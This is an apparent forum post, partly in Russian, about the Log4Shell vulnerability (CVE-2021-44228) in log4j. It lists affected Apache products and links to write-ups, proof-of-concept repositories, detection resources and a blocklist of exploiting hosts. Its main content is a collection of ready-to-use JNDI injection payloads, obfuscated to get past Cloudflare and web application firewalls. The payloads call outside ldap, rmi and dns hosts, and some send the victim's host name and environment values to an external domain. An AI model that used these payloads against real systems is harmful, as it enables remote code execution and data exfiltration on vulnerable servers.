Log4Shell - RCE 0-day exploit in log4j 2, a popular Java logging package.
Обычно установлен на:
Apache Struts
Apache Solr
Apache Druid
Apache Flink
А так же:
GitHub - YfryTchsGD/Log4jAttackSurface
Contribute to YfryTchsGD/Log4jAttackSurface development by creating an account on GitHub.
github.com
Writeups:
Log4Shell: RCE 0-day exploit found in log4j, a popular Java logging package | LunaTrace
Given how ubiquitous log4j is, the impact of this vulnerability is quite severe. Learn how to fix Log4Shell, why it's bad, and what a working exploit requires in this post.
www.lunasec.io
IBM Randori Recon
Learn about attack surface management SaaS that continuously monitors to look for unexpected changes, blind spots, misconfigurations and process failures.
www.randori.com
PoC's:
GitHub - tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce: Apache Log4j 远程代码执行
Apache Log4j 远程代码执行. Contribute to tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce development by creating an account on GitHub.
github.com
GitHub - YfryTchsGD/Log4jAttackSurface
Contribute to YfryTchsGD/Log4jAttackSurface development by creating an account on GitHub.
github.com
GitHub - xiajun325/apache-log4j-rce-poc
Contribute to xiajun325/apache-log4j-rce-poc development by creating an account on GitHub.
github.com
GitHub - udoless/apache-log4j-rce-poc
Contribute to udoless/apache-log4j-rce-poc development by creating an account on GitHub.
github.com
Detection:
Log4j RCE CVE-2021-44228 Exploitation Detection
Log4j RCE CVE-2021-44228 Exploitation Detection. GitHub Gist: instantly share code, notes, and snippets.
gist.github.com
Здесь списки забаненых хостов которые эксплоатируют Log4Shell
GreyNoise
At GreyNoise, we collect and analyze untargeted, widespread, and opportunistic scan and attack activity that reaches every server directly connected to the Internet.
www.greynoise.io
CF bypass:
${jndi:dns://aeutbj.example.com/ext}
${jndi:${lower:l}${lower:d}a${lower
}://example.com/
WAF bypass:
${jndi:ldap://127.0.0.1:1389/ badClassName}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${::-j}ndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${jndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
${${lower:jndi}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:${lower:jndi}}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:jndi}:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:j}${upper:n}${upper:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${:
}://${hostName}.nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
${${upper::-j}${upper::-n}${::-d}${upper::-i}:${upper::-l}${upper::-d}${upper::-a}${upper:
}://${hostName}.nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${:
}://${hostName}.${env:COMPUTERNAME}.${env:USERDOMAIN}.${env}.nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
Последнее редактирование: 14.12.2021